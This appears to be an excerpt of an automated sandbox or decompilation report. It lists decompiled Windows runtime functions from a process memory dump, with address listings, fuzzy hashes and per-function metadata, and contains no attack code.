					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x50b7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04FE4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M04FFE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x04ffe730
0x04ffe736
0x04ffe738
0x04ffe73d
0x04ffe73e
0x04ffe740
0x04ffe749
0x04ffe765
0x04ffe76a
0x04ffe76b
0x04ffe76c
0x04ffe76d
0x04ffe76e
0x04ffe76f
0x04ffe775
0x04ffe777
0x04ffe77e
0x0503b675
0x04ffe784
0x04ffe784
0x04ffe789
0x04ffe7a8
0x04ffe7ac
0x04ffe807
0x04ffe7ae
0x04ffe7ae
0x04ffe7b1
0x04ffe7b4
0x04ffe7b9
0x04ffe7c0
0x04ffe7c4
0x04ffe7ca
0x04ffe7cc
0x00000000
0x04ffe7d3
0x04ffe7d6
0x00000000
0x00000000
0x04ffe7ff
0x04ffe802
0x00000000
0x00000000
0x04ffe7f9
0x04ffe7fc
0x00000000
0x00000000
0x04ffe7f3
0x04ffe7f6
0x00000000
0x00000000
0x04ffe7ed
0x04ffe7f0
0x00000000
0x00000000
0x04ffe7e7
0x04ffe7ea
0x00000000
0x00000000
0x0503b685
0x0503b688
0x00000000
0x00000000
0x0503b682
0x00000000
0x00000000
0x04ffe7cc
0x04ffe7d9
0x04ffe7dc
0x04ffe7de
0x04ffe7de
0x04ffe7ac
0x04ffe7e4
0x04ffe74b
0x04ffe751
0x04ffe759
0x04ffe761
0x04ffe761

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db627823d546501f332ff0b6eb03723c494b9a06d39c8c9a2fd8b3e9f78dbcf5
Instruction ID: 2a51720e9baa93d2e294cf45c389d2496fa4cf5ce5634ba5164a41dee5551319
Opcode Fuzzy Hash: db627823d546501f332ff0b6eb03723c494b9a06d39c8c9a2fd8b3e9f78dbcf5
Instruction Fuzzy Hash: 3F318E76A14249EFD704CF58D841B9AB7E8FF18314F148256FA14CB351E635E981CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04FFBC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04FFBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x50b6100; // 0x42
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04FE2280(0xd, 0x1938f1a0);
				_t41 =  *0x50b60f8; // 0x0
				if(_t41 != 0) {
					 *0x50b60f8 =  *_t41;
					 *0x50b60fc =  *0x50b60fc + 0xffff;
				}
				E04FDFFB0(_t41, 0x800, 0x1938f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x50b60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04FE4620(0x50b6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x50b6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x04ffbc36
0x04ffbc42
0x04ffbc45
0x04ffbc4a
0x04ffbd35
0x00000000
0x00000000
0x00000000
0x00000000
0x04ffbc50
0x04ffbc50
0x04ffbc58
0x04ffbc5a
0x04ffbc60
0x00000000
0x00000000
0x0503a4f2
0x0503a4f6
0x00000000
0x00000000
0x00000000
0x0503a4fc
0x04ffbc79
0x04ffbc7e
0x04ffbc86
0x04ffbd16
0x04ffbd20
0x04ffbd20
0x04ffbc8d
0x04ffbc94
0x04ffbcbd
0x04ffbcca
0x04ffbccb
0x04ffbccc
0x04ffbccd
0x04ffbcce
0x04ffbcd4
0x04ffbcea
0x04ffbcee
0x04ffbcf2
0x04ffbd00
0x04ffbd04
0x00000000
0x04ffbc96
0x04ffbcab
0x04ffbcaf
0x04ffbd2c
0x04ffbd2c
0x04ffbd09
0x00000000
0x04ffbd09
0x04ffbcb1
0x04ffbcb5
0x04ffbcbb
0x00000000
0x00000000
0x00000000
0x04ffbcbb

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8335836740454e006af1d8030c70a9478f383abc7c60e2b0d1d2f0e135759c53
Instruction ID: f189bf1d1e1b58abf90227e6f1e26b219ce6a405ce027d65fa1696a771e89912
Opcode Fuzzy Hash: 8335836740454e006af1d8030c70a9478f383abc7c60e2b0d1d2f0e135759c53
Instruction Fuzzy Hash: F4310E32A206159BEB11DF58D8C17AA77B4FF08311F080478EE44EB211EB79F9478B80

Uniqueness

Uniqueness Score: -1.00%

Function 04FF1DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E04FF1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E04FEF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L04FE4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E04FEF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x04ff1dc2
0x04ff1dc5
0x04ff1dc7
0x04ff1dcc
0x04ff1dce
0x04ff1dd6
0x04ff1ddf
0x04ff1de0
0x04ff1de1
0x04ff1de5
0x04ff1de8
0x04ff1def
0x04ff1df0
0x04ff1df6
0x04ff1df7
0x04ff1dfe
0x04ff1e1a
0x00000000
0x00000000
0x04ff1e0b
0x04ff1e12
0x04ff1e12
0x04ff1e00
0x04ff1e00
0x04ff1e05
0x04ff1e1e
0x04ff1e23
0x0503570f
0x05035713
0x00000000
0x00000000
0x05035719
0x05035719
0x04ff1e2c
0x04ff1e2d
0x04ff1e2e
0x04ff1e2f
0x04ff1e31
0x04ff1e32
0x04ff1e35
0x04ff1e3d
0x05035723
0x0503573d
0x0503573d
0x00000000
0x05035723
0x04ff1e49
0x04ff1e4e
0x04ff1e4e
0x04ff1e09
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: ed4490be0996191e45f72e24801fe8ba6caa03a2d5447aa412eb05b1f3baab17
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: E0218172B00119FFD721CF59DE80EABBBBDEF85645F114055EA0597220DA34BE02DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04FC9100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04FC9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x509f6e8);
				E0501D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E050988F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0501D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x50b86c0; // 0x32007b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x50b86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04FE2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E050988F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0500AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x50bb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x50b84c0;
										if(_t69 >=  *0x50b84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E05099063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E04FC922A(_t82);
							_t53 = E04FE7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E05098B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x50b86c0; // 0x32007b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x50b86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x50b86bc;
										_t72 = 0x50b86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04FC9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x50b86c4;
									_t72 = 0x50b86c0;
									L18:
									E04FF9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x04fc9100
0x04fc9100
0x04fc9100
0x04fc9100
0x04fc9102
0x04fc9107
0x04fc910c
0x04fc9110
0x04fc9115
0x04fc9136
0x04fc9143
0x050237e4
0x050237e4
0x04fc9149
0x04fc914e
0x04fc914e
0x04fc9117
0x04fc911d
0x00000000
0x00000000
0x04fc911f
0x04fc9125
0x00000000
0x04fc9151
0x04fc9158
0x04fc915d
0x04fc9161
0x04fc9168
0x05023715
0x00000000
0x04fc916e
0x04fc916e
0x04fc9175
0x04fc9177
0x04fc917e
0x04fc917f
0x04fc9182
0x04fc9182
0x04fc9187
0x04fc9187
0x04fc918a
0x04fc918d
0x04fc918f
0x04fc9192
0x04fc9195
0x04fc9198
0x04fc9198
0x04fc9198
0x04fc919a
0x00000000
0x00000000
0x0502371f
0x05023721
0x05023727
0x0502372f
0x05023733
0x05023735
0x05023738
0x0502373b
0x0502373d
0x05023740
0x00000000
0x00000000
0x05023746
0x05023749
0x00000000
0x00000000
0x0502374f
0x05023751
0x00000000
0x00000000
0x05023757
0x05023759
0x0502375c
0x0502375c
0x0502375e
0x0502375e
0x05023761
0x05023764
0x00000000
0x00000000
0x05023766
0x05023768
0x050237a3
0x050237a3
0x050237a5
0x050237a7
0x050237ad
0x050237b0
0x050237b2
0x050237bc
0x050237c2
0x050237c2
0x050237b2
0x04fc9187
0x04fc9187
0x04fc918a
0x04fc918d
0x04fc918f
0x04fc9192
0x04fc9195
0x00000000
0x04fc9195
0x00000000
0x04fc9187
0x0502376a
0x0502376a
0x0502376c
0x0502376c
0x0502376f
0x05023775
0x00000000
0x00000000
0x05023777
0x05023779
0x00000000
0x00000000
0x05023782
0x05023787
0x05023789
0x05023790
0x05023790
0x0502378b
0x0502378b
0x0502378b
0x05023792
0x05023795
0x05023795
0x05023798
0x05023798
0x0502379b
0x0502379b
0x04fc91a3
0x04fc91a9
0x04fc91b0
0x04fc91b4
0x04fc91b4
0x04fc91bb
0x04fc91c0
0x04fc91c5
0x04fc91c7
0x050237da
0x04fc91cd
0x04fc91cd
0x04fc91cd
0x04fc91d2
0x04fc91d5
0x04fc9239
0x04fc9239
0x04fc91d7
0x04fc91db
0x04fc91e1
0x04fc91e7
0x04fc91fd
0x04fc9203
0x04fc921e
0x04fc9223
0x00000000
0x04fc9223
0x04fc9205
0x04fc9208
0x04fc920c
0x04fc9214
0x04fc9214
0x04fc91e9
0x04fc91e9
0x04fc91ee
0x04fc91f3
0x04fc91f3
0x04fc91f3
0x04fc91e7
0x00000000
0x04fc91db
0x04fc9187
0x04fc9168

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9151250824cad5b049532e59454d194478067a371b015e225d36f1ec8c1134e9
Instruction ID: 4f1a6cfb7922295d4ff4e87096e2c004f6d4105b75e29de8611c4c9a3792825e
Opcode Fuzzy Hash: 9151250824cad5b049532e59454d194478067a371b015e225d36f1ec8c1134e9
Instruction Fuzzy Hash: 00319EB5E00286DFEB25DB68D689FECBBB1BF49314F18814DD40467250D3B4B982CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04FE0050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04FE0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x50bd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04FF9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0500B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E05098A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04FF9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x50bb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x04fe0055
0x04fe005d
0x04fe0062
0x04fe006c
0x04fe006f
0x04fe0074
0x04fe007a
0x04fe007a
0x04fe0080
0x04fe0080
0x04fe0087
0x04fe008d
0x04fe008f
0x04fe0093
0x04fe0095
0x04fe009b
0x04fe00f8
0x04fe00fb
0x04fe00fc
0x04fe00ff
0x04fe0108
0x04fe0108
0x04fe00a2
0x04fe00a6
0x04fe00b3
0x04fe00bc
0x04fe00c5
0x04fe00ca
0x0502c01e
0x00000000
0x00000000
0x0502c02d
0x04fe00d5
0x04fe00d9
0x0502c03d
0x0502c046
0x0502c046
0x04fe00df
0x04fe00e2
0x04fe00ea
0x04fe00ef
0x04fe00f2
0x04fe00f6
0x04fe0111
0x04fe0117
0x04fe0117
0x00000000
0x04fe00f6
0x04fe00d0
0x04fe00d0
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9931c057d31203064db8845cc15e6d59135a56a1c8862f4fe7eb4a00cc2289e
Instruction ID: 3214de901e66222959657fabd1f20fe80cdfa121ff0d5bfe9d18ffd2080ebfb6
Opcode Fuzzy Hash: c9931c057d31203064db8845cc15e6d59135a56a1c8862f4fe7eb4a00cc2289e
Instruction Fuzzy Hash: 5731AE32601B149FD721CF28C884BAAB3E5FF88719F14456DE59687790EB75B802CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05046C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E05046C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E04FE7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x50b7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L04FE4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0500F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E04FE7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E05009AE0();
						_t23 = L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x05046c0a
0x05046c0f
0x05046c10
0x05046c13
0x05046c15
0x05046c19
0x05046c1c
0x05046c21
0x05046c28
0x05046c3a
0x05046c2a
0x05046c33
0x05046c33
0x05046c3f
0x05046c48
0x05046c4d
0x05046c60
0x05046c65
0x05046c69
0x05046c73
0x05046c79
0x05046c7f
0x05046c86
0x05046c90
0x05046c94
0x05046ca6
0x05046cb2
0x05046cbd
0x05046cbd
0x05046cc3
0x05046cc7
0x05046ccb
0x05046cd0
0x05046cd1
0x05046ce2
0x05046ce2
0x05046c69
0x05046ced

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bc52505b46515edc0cee045535c29ff51ccc3686ad6eb87e466ff602292a8eb
Instruction ID: 4c723520b0351aba029748862bdbdf93fbbe774d3d3c12d4c8386336b4d9ec9c
Opcode Fuzzy Hash: 7bc52505b46515edc0cee045535c29ff51ccc3686ad6eb87e466ff602292a8eb
Instruction Fuzzy Hash: 7321C7B1A00644ABD725DB69E880E7AB7F8FF48304F04006AF909CB791E635E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 050090AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E050090AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0501D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E04FFE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04FE4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0500F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E04FFA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x050090af
0x050090b8
0x050090bb
0x050090bf
0x050090c2
0x050090c2
0x050090c8
0x050090cb
0x050090cd
0x050414d7
0x050414eb
0x050414eb
0x00000000
0x050414eb
